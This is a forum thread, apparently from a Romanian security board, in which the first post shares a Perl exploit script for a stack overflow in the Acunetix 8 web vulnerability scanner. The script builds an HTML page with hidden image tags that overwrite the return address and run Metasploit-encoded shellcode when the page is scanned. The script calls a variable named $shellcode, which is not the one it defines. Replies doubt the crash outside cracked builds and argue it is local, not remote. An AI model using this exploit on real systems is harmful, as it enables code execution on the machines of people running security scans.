Jump to content
SirGod

Acunetix 8 build 20120704 - Remote Stack Based Overflow

By SirGod, in Exploituri

Recommended Posts

SirGod Contributor

SirGod

Posted
Posted

Have fun! :-)

# Exploit Title: Acunetix Stack Based overflow# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP

[B]#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.[/B]

my $file= "index.html";
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";

my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";

my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;

my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print"Acunetix Killer File Created successfully\n";

Link to comment
Share on other sites
tpad Newbie

tpad

Posted
Posted (edited)

acunetix

39 minutes ago

We cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9.

However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the cracked replaced the executable with another executable.?

It figures.

Edited by tpad
Link to comment
Share on other sites
neox Newbie

neox

Posted
Posted

La prima vedere pare interesant dar nu este Remote exploit este un exploit local se vede clar crearea file index.html

An7i Security: Pwn the n00bs - Acunetix 0day ---> video

Ori sunt eu batut in cap dar asta este local exploit .

De exemplu exploitul asta de la exploit-db Acunetix 8 build 20120704 - Remote Stack Based Overflow Acunetix 8 build 20120704 arata ca un exploit remote dar tot asa "create file" foloseste payload ca calc si back-connect nu atac direct port sau alte minuni ca sa fie remote.

In video asta tot asa create file .

Eu zic ca asta este local exploit :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...